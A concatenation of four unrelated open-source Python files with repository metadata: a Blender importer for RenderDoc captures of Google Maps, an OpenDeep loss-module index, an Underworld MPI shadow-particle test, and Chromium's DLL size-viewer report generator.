bpy_extras.io_utils import ImportHelper from bpy.props import StringProperty, IntProperty from bpy.types import Operator from .google_maps import importCapture, MapsModelsImportError from .preferences import getPreferences class IMP_OP_GoogleMapsCapture(Operator, ImportHelper): """Import a capture of a Google Maps frame recorded with RenderDoc""" bl_idname = "import_rdc.google_maps" bl_label = "Import Google Maps Capture" filename_ext = ".rdc" filter_glob: StringProperty( default="*.rdc", options={'HIDDEN'}, maxlen=1024, # Max internal buffer length, longer would be clamped. ) max_blocks: IntProperty( name="Max Blocks", description="Maximum number of draw calls to load", default=-1, ) def execute(self, context): pref = getPreferences(context) try: importCapture(context, self.filepath, self.max_blocks, pref) error = None except MapsModelsImportError as err: error = err.args[0] if error is not None: self.report({'ERROR'}, error) return {'FINISHED'} def menu_func_import(self, context): self.layout.operator(IMP_OP_GoogleMapsCapture.bl_idname, text="Google Maps Capture (.rdc)") def register(): bpy.utils.register_class(IMP_OP_GoogleMapsCapture) bpy.types.TOPBAR_MT_file_import.append(menu_func_import) def unregister(): bpy.utils.unregister_class(IMP_OP_GoogleMapsCapture) bpy.types.TOPBAR_MT_file_import.remove(menu_func_import)
opendeep/optimization/loss/__init__.py
vitruvianscience/OpenDeep
252
12635966
<filename>opendeep/optimization/loss/__init__.py from __future__ import division, absolute_import, print_function from opendeep.optimization.loss.loss import * from opendeep.optimization.loss.binary_crossentropy import * from opendeep.optimization.loss.categorical_crossentropy import * from opendeep.optimization.loss.isotropic_gaussian_LL import * from opendeep.optimization.loss.mse import * from opendeep.optimization.loss.neg_LL import * from opendeep.optimization.loss.zero_one import * from opendeep.optimization.loss import utils
docs/test/shadow_particle_test.py
longgangfan/underworld2
116
12635997
import h5py if h5py.get_config().mpi == False: import warnings warnings.warn("h5py not MPI enabled. Discontinuing test.") import sys sys.exit(0) import underworld as uw import numpy as np mesh = uw.mesh.FeMesh_Cartesian(elementRes=(128,128)) swarm = uw.swarm.Swarm(mesh) # create some variables to track origOwningEl = swarm.add_variable('int',1) origCreatingProc = swarm.add_variable('int',1) origParticleIndex = swarm.add_variable('int',1) randomNumber = swarm.add_variable('int',1) swarm.populate_using_layout(uw.swarm.layouts.PerCellSpaceFillerLayout(swarm,20)) # init variables origOwningEl.data[:] = mesh.data_elgId[swarm.owningCell.data[:]] # global elementId where created origCreatingProc.data[:] = uw.mpi.rank # rank where created origParticleIndex.data[:,0] = range(swarm.particleLocalCount) # local index where created from random import randint for index in range(0,swarm.particleLocalCount): # add random numbers to this variable randomNumber.data[index] = randint(0,9999999) # get max local particlecount across all procs from mpi4py import MPI import numpy as np comm = MPI.COMM_WORLD inguy = np.zeros(1) outguy = np.zeros(1) inguy[:] = swarm.particleLocalCount comm.Allreduce(inguy, outguy, op=MPI.MAX) # create h5 array for players to write primary data into f = h5py.File('primarydata.hdf5', 'w', driver='mpio', comm=MPI.COMM_WORLD) dset_data = f.create_dataset('randomdata', (comm.Get_size(),outguy[0]), dtype='i') # write primary data parallel array dset_data[uw.mpi.rank,origParticleIndex.data[:,0]] = randomNumber.data[:,0] # also create one to write particle element counts dset_counts = f.create_dataset('counts', (mesh.elementsGlobal,), dtype='i') # get counts el_index, counts = np.unique(origOwningEl.data[:,0],return_counts=True) for element_gId, el_count in zip (el_index,counts): dset_counts[element_gId] = el_count if len(origCreatingProc.data_shadow) != 0: raise RuntimeError("The shadow data should be empty at this stage, but isn't. Hmm...") # get shadow particles!! swarm.shadow_particles_fetch() if len(origCreatingProc.data_shadow) == 0 and (uw.mpi.size>1): raise RuntimeError("The shadow data should be populated at this stage, but isn't. Hmm...") # now check that communicated particles contain required data. # first create local numpy copies of primary data in memory, # as h5py has limitations in the way you can index its arrays dset_numpy_data = np.array(dset_data) if not (dset_numpy_data[origCreatingProc.data_shadow[:,0], origParticleIndex.data_shadow[:,0]] == randomNumber.data_shadow[:,0]).all(): raise RuntimeError("Shadow particle data does not appear to be correct.") # also check that we have the correct particle counts # get counts el_index, counts = np.unique(origOwningEl.data_shadow[:,0],return_counts=True) # again create copy for indexing ease dset_numpy_counts = np.array(dset_counts) if not (dset_numpy_counts[el_index] == counts[:]).all(): raise RuntimeError("Shadow data particle counts do not appear to be correct.") # close and cleaup f.close() import os if uw.mpi.rank==0: os.remove('primarydata.hdf5')
tools/win/sizeviewer/sizeviewer.py
zealoussnow/chromium
14,668
12636002
# Copyright 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. from __future__ import print_function import base64 import codecs import json import os import string import subprocess import sys BASE_DIR = os.path.dirname(os.path.abspath(__file__)) def Run(*args): p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) out, err = p.communicate() if p.returncode != 0: raise SystemExit(out) def FindNode(node, component): for child in node['children']: if child['name'] == component: return child return None def InsertIntoTree(tree, source_name, size): components = source_name[3:].split('\\') node = tree for index, component in enumerate(components): data = FindNode(node, component) if not data: data = { 'name': source_name, 'name': component } if index == len(components) - 1: data['size'] = size else: data['children'] = [] node['children'].append(data) node = data def FlattenTree(tree): result = [['Path', 'Parent', 'Size', 'Value']] def Flatten(node, parent): name = node['name'] if parent and parent != '/': name = parent + '/' + name if 'children' in node: result.append([name, parent, -1, -1]) for c in node['children']: Flatten(c, name) else: result.append([name, parent, node['size'], node['size']]) Flatten(tree, '') return result def GetAsset(filename): with open(os.path.join(BASE_DIR, filename), 'rb') as f: return f.read() def AppendAsScriptBlock(f, value, var=None): f.write('<script type="text/javascript">\n') if var: f.write('var ' + var + ' = ') f.write(value) if var: f.write(';\n') f.write('</script>\n') def main(): jsons = [] if len(sys.argv) > 1: dlls = sys.argv[1:] else: out_dir = os.path.join(BASE_DIR, '..', '..', '..', 'out', 'Release') dlls = [os.path.normpath(os.path.join(out_dir, dll)) for dll in ('chrome.dll', 'chrome_child.dll')] for dll_path in dlls: if os.path.exists(dll_path): print('Tallying %s...' % dll_path) json_path = dll_path + '.json' Run(os.path.join(BASE_DIR, '..', '..', '..', 'third_party', 'syzygy', 'binaries', 'exe', 'experimental', 'code_tally.exe'), '--input-image=' + dll_path, '--input-pdb=' + dll_path + '.pdb', '--output-file=' + json_path) jsons.append(json_path) if not jsons: print('Couldn\'t find dlls.') print( 'Pass fully qualified dll name(s) if you want to use something other ') print('than out\\Release\\chrome.dll and chrome_child.dll.') return 1 # Munge the code_tally json format into an easier-to-view format. for json_name in jsons: with open(json_name, 'r') as jsonf: all_data = json.load(jsonf) html_path = os.path.splitext(json_name)[0] + '.html' print('Generating %s... (standlone)' % html_path) by_source = {} symbols_index = {} symbols = [] for obj_name, obj_data in all_data['objects'].iteritems(): for symbol, symbol_data in obj_data.iteritems(): size = int(symbol_data['size']) # Sometimes there's symbols with no source file, we just ignore those. if 'contribs' in symbol_data: i = 0 while i < len(symbol_data['contribs']): src_index = symbol_data['contribs'][i] i += 1 per_line = symbol_data['contribs'][i] i += 1 source = all_data['sources'][int(src_index)] if source not in by_source: by_source[source] = {'lines': {}, 'total_size': 0} size = 0 # per_line is [line, size, line, size, line, size, ...] for j in range(0, len(per_line), 2): line_number = per_line[j] size += per_line[j + 1] # Save some time/space in JS by using an array here. 0 == size, # 1 == symbol list. by_source[source]['lines'].setdefault(line_number, [0, []]) by_source[source]['lines'][line_number][0] += per_line[j + 1] if symbol in symbols_index: symindex = symbols_index[symbol] else: symbols.append(symbol) symbols_index[symbol] = symindex = len(symbols) - 1 by_source[source]['lines'][line_number][1].append( symindex) by_source[source]['total_size'] += size binary_name = all_data['executable']['name'] data = {} data['name'] = '/' data['children'] = [] file_contents = {} line_data = {} for source, file_data in by_source.iteritems(): InsertIntoTree(data, source, file_data['total_size']) store_as = source[3:].replace('\\', '/') try: with codecs.open(source, 'rb', encoding='latin1') as f: file_contents[store_as] = f.read() except IOError: file_contents[store_as] = '// Unable to load source.' line_data[store_as] = file_data['lines'] # code_tally attempts to assign fractional bytes when code is shared # across multiple symbols. Round off here for display after summing above. for per_line in line_data[store_as].values(): per_line[0] = round(per_line[0]) flattened = FlattenTree(data) maxval = 0 for i in flattened[1:]: maxval = max(i[2], maxval) flattened_str = json.dumps(flattened) to_write = GetAsset('template.html') # Save all data and what would normally be external resources into the # one html so that it's a standalone report. with open(html_path, 'w') as f: f.write(to_write) # These aren't subbed in as a silly workaround for 32-bit python. # The end result is only ~100M, but while substituting these into a # template, it otherwise raises a MemoryError, I guess due to # fragmentation. So instead, we just append them as variables to the file # and then refer to the variables in the main script. filedata_str = json.dumps(file_contents).replace( '</script>', '</scr"+"ipt>') AppendAsScriptBlock(f, filedata_str, var='g_file_contents') AppendAsScriptBlock(f, json.dumps(line_data), var='g_line_data') AppendAsScriptBlock(f, json.dumps(symbols), var='g_symbol_list') favicon_str = json.dumps(base64.b64encode(GetAsset('favicon.png'))) AppendAsScriptBlock(f, favicon_str, var='g_favicon') AppendAsScriptBlock(f, flattened_str, var='g_raw_data') AppendAsScriptBlock(f, str(maxval), var='g_maxval') dllname_str = binary_name + ' ' + all_data['executable']['version'] AppendAsScriptBlock(f, json.dumps(dllname_str), var='g_dllname') AppendAsScriptBlock(f, GetAsset('codemirror.js')) AppendAsScriptBlock(f, GetAsset('clike.js')) AppendAsScriptBlock(f, GetAsset('main.js')) f.write('</html>') return 0 if __name__ == '__main__': sys.exit(main())